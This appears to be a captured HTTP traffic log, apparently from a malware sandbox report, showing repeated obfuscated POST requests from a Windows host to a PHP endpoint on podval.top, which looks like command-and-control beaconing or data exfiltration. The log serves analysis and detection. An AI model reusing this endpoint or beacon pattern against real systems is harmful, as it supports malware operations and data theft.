                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:36.202522993 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:36.202711105 CEST | 1792 | OUT | Data Raw: 5a 55 5f 5f 5b 5d 52 5f 58 56 55 51 50 5f 59 50 55 58 5e 5b 51 5b 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZU__[]R_XVUQP_YPUX^[Q[SYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"'* @&9#_'V')4!Y,.$6',> 41<-,"['$Y =
                                                    Jul 3, 2024 16:43:36.486654043 CEST  729  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrnHK4NzDkroEODtNVoRqfponWW1oM7IKWi9uvBtwcykG%2FqdWX%2F5t2psZtuaSWaZ97y%2FkUhE7doNdQX3MgHgVid4cNsNUfbf0njk4yNTp6dwAHken2tQpU239I0S"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a616f9d642fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:37.510761976 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:37.608999968 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:37.933255911 CEST  729  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:37 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yomWasEoM2fnWlp2WZQpnieaqoSrRYMAc5ZRE1j6j2%2FMBZ%2BQunlcVu4iGr0WSZ19fDauH2yHcSylk6aTtaFwp%2B4it2hTzxS0dzI327XBhUANDZTQfjctGdsHBxtj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a61fcc9942fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:38.948298931 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:39.047184944 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:39.381081104 CEST  729  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:39 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGujGZJzvfx2qQu93evH463tjC4sEgGNuvolIiDJ1q3KY8E8UrfhjaZI246bmna69luF8Wm4l2YA0cozsOaakQ4Pu%2BXAk9o%2F4IZconHEht2w72v%2BzbJVOCOlWCiY"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a628bd1a42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:40.385736942 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:40.484080076 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:40.818722963 CEST  720  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:40 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fy8jx1YMfY3NpNVKhTHoKCwk8BcaFnukVJg3bGOd7kfFMHM1PikizpewMSqla%2BsYNgsMWgkT4sdv24c6zq1NzQ6PUQvf0iqKzZEGrb8fQ6UnoGTibEXuEfKsl9T9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a631be9642fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:41.968285084 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:42.066499949 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:42.395004988 CEST  725  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:42 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=io3922vvlvXpgXCmwzLxl4hnZyDhTOeIWm2vjPhOgKAXdmHO5GZO%2FNTWx0Tl9Z9Hcdjkm9mPWda0I4KYzx3sjwUytujAztijQPev5QzRiwW9stHPf5oX99I271qW"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a63b98f142fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:43.401257038 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:43.499656916 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:43.834103107 CEST  729  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:43 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wweH%2Fbk%2BTWGyb%2FwaPfh6c0dKlvne9q6kAnviW9cuf5LnmqUm6y9MZpiyFvubHD2MG3cW0qWUdwVwPyPmzfpysgSLhezPZZ4KHhGPlNazLfeEParetFMsuMRTiYzT"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6449a1042fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:44.839131117 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:44.937432051 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:45.339270115 CEST  733  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:45 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oY48L38sjQb8fdZxLygJYr%2BwjsXncG3Mkr0eKhRI1y1q3VTzubxIG2fWRT3mXgeAIvShj2IeTsrfKmV5%2BnbwSaADGN%2FwOWvHhqH1G1kgY9RDy%2FENtbW5THtc6%2BY9"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a64d8aef42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:46.356400967 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:46.455179930 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:46.753828049 CEST  735  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:46 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tp56h%2BJMHjFlAVWXgURs6nx9A4CR%2BMeYj6puNi8gio4NRR%2F3M%2BArIJ%2BoX0vYyWtyNioQ2L%2B8TxvVckljzKUaA1Nkg1FdEdzL5VYHYmO8ZPk0pMoN3b6OOwuaooq"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6570c1242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:47.761028051 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:47.859983921 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:48.210644007 CEST  743  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N1oiVuhxgZjSmS2wf%2FIYEIv%2Bdo2szRHrtN%2BEJ5RjBG195%2FiqGhXm7G6haz3E49FjMlUF1%2BP%2BQvqAK7mpi%2Fhluh4lhVx%2FQJsY4ieGwKJ3Ojb%2Bc3zahvx%2F0gOm1HkC"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a65fdd1842fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:49.214082956 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:49.313589096 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:49.648189068 CEST  728  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WiaB%2BXYfEGNzshbiHWYN52P7Gd2qHjpRwN2V88t85%2Fr%2BXUhhLcu9Z15SIn2RSpc4bhIJMD064c21K829RYJBpD8NOied2CAI44g4AlOL5WM%2BRwtHWXR3ON1%2FzfBb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a668ee9742fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:50.794486046 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:50.894210100 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:51.202677965 CEST  729  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E35PYclZ303RJEFljSFlCz%2BiSvFQ59ens%2FW4DuZgHXnfdJLDk1bF%2BQWJl06v5Lxfbb5Unpa2GaE9I9cs9fRBlPOUaCDag6jy3VkgB9WKjX4aWUKf1Cs6Io11t1n3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a672c9ba42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:52.216429949 CEST  270  OUT  POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:52.314860106 CEST  25  IN  HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:52.647317886 CEST  733  IN  HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xN7B4Ki73wH3QI0y%2FyMI8BVoQPB2Qvc94re3W%2FTgdDQ7lxCp7ZunTcU%2F9YTdctPeRKXtYKWmuQvEYxjJac%2Fj5onYyVdSaPLpfRdjAeW6BQQ4jeHrKYYmCoQX%2BKKj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a67bacc242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:53.651774883 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:53.750480890 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:54.088128090 CEST | 737 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xf36Hxq35kO%2BgXGQcLWjKJUWbAS%2BEmYkd%2F6Htax9s9BVPV%2F924i95mGGN%2BDh2%2FfnSaYMFQ7N8CC%2BEeL66A3vyNmLJWh6h7fpg1Mr1EaZYPpRv3Ar6hYi9BcHRxWb"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a684ae7242fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:55.104429007 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:55.202750921 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:55.541383028 CEST | 725 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vf4hz3C2FIXf8MP6ZPmRIaaZ02kKtVEpIQ%2Bo0zEEPGY8Tf4pg0D6VLgmxNrxvoHz3SOemjIvAa9BWoAZ9SKRwwsudgJEhCavcTRtwG3cLw7vxG1jd68GFTaPzjsq"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a68db8ba42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:56.558155060 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:56.683948040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:57.043239117 CEST | 733 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:56 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vJRsYFxMpfQ0DbHYXrtXKXkFN5m7MBCQG%2FONsAFm%2FK3VMug14PCQnIGAGrDL8%2Bs2Z20KCRiRauMhK5cQJYVH%2B%2B7MZZbBawcnzuXTJwuMQjP16KbOCp57k6EaBRSz"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a696ea6b42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:58.068661928 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:58.166929007 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:58.469916105 CEST | 725 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:58 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pt1jzbHBAZk8bJrc1HT4EIXdyWQlhfzOczjI%2BNuQm70GDFb1d4F2S1Gdk9q4D3lgS4j0nn01xAVw2xqYi3j6wXCLWSKAa9Wgbr7CuW0zwYzC9sgtPCTGlxEBuH7H"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a03cb142fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:43:59.480606079 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:43:59.580305099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:43:59.916098118 CEST | 731 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:43:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3zwSqpcQglI%2B1abanwefIOvvzxQnmXv2RCRxLS%2Bo4jZNeNo6zhF5ECIAhw40%2FpRsnge7KBJnaqZc1YI6Fw%2FfJjBNoSd1uwaHSVYYvqeJN1ym82QNIpkA2feD0QH"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6a91f5442fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:00.933501959 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:01.167434931 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:01.556741953 CEST | 736 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YumhUAuijX%2FqH1iLvbPeWSjuTVAKap%2BKwuKaXZDRI1BNKDtAgqg%2FcwykprGBt2d08nV%2Fw3bzCGbhzT%2Fi%2B2hCrhJm3MYu9bT8XBqq3ol%2BGtth%2FWv3ifAWS%2FSaaq35"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6b28a8042fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:02.700428963 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:02.798968077 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:03.267462969 CEST | 735 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdxVu10eh6nhQo5xkMe6wtss2niIsmqIzODVAmWrmUOuuly7szNDG%2Bxh4hVO%2Bi5lj3Tv0R8uD83%2FDe0%2BjJmku3%2ByC7Yb%2FzoCjMAc2Mfc4wR0IGvMfUpaplODgkeZ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6bd3e0d42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:04.276415110 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1792
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:04.376106024 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:04.708268881 CEST | 728 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Z8%2Bv0DMKHVz9mKb4D2JXJRMeYALlpi0dVDC3fZ%2FMh5vmc9MRbW9t%2FdPP9y2k9nLdox9MeRrs3yX5Bx6CSzFOoJ%2FA9dzPazr2rwAM%2BE7AAmH9NoBn1NsdGrOKB5T"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a6c70ffb42fc-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Jul 3, 2024 16:44:05.854451895 CEST | 270 | OUT | POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: podval.top
                                                    Content-Length: 1780
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:44:06.074498892 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:44:06.401403904 CEST | 718 | IN | HTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:44:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
